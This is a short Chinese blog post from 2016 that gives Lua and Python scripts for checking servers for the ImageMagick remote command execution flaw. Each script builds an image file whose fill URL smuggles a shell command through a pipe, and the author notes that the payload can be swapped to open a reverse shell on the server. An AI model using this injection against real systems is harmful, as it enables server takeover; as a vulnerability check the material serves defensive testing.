ImageMagick远程命令执行工具检测工具

 

ImageMagick这个漏洞昨天晚上就出来了,今天才有时间研究一下,今天自己也测试了一下

效果图:

 

=======================

 

用lua写了一个检测脚本

 1 print ("Checking...")
 2 file=io.open("exp.jpg","w")
 3 --file:write("s")
 4 file:write("push graphic-context\r\nviewbox 0 0 640 480\r\n")
 5 file:write("fill 'url(https://example.com/image.jpg")
 6 file:write('"|echo "success!!!)')
 7 file:write("'\r\n")
 8 file:write("pop graphic-context")
 9 file:close()
10 cmd=io.popen("convert exp.jpg test.png")
11 result=cmd:read("*all")
12 print(result)

python版本:

 1 import os
 2 
 3 file = open("./x","w")
 4 file.write("push graphic-context\r\n")
 5 file.write("viewbox 0 0 640 480\r\n")
 6 file.write("fill 'url(https://example.com/image.jpg\"|echo \"dangerous!)'\r\n")
 7 file.write("pop graphic-context\r\n")
 8 file.close()
 9 
10 res = os.system("convert ./x ./y 2>/dev/null")
11 if os.path.exists("x"):
12     os.remove("x")
13 if os.path.exists("y"):
14     os.remove("y")

 

如果存在返回

 

当然playload自己改吧,可以直接反弹个shell回来,直接拿到服务器权限

 

附上一篇分析文章:

http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462399591384&from=groupmessage&isappinstalled=0

posted @ 2016-05-05 16:24  sevck  阅读(1844)  评论(0编辑  收藏  举报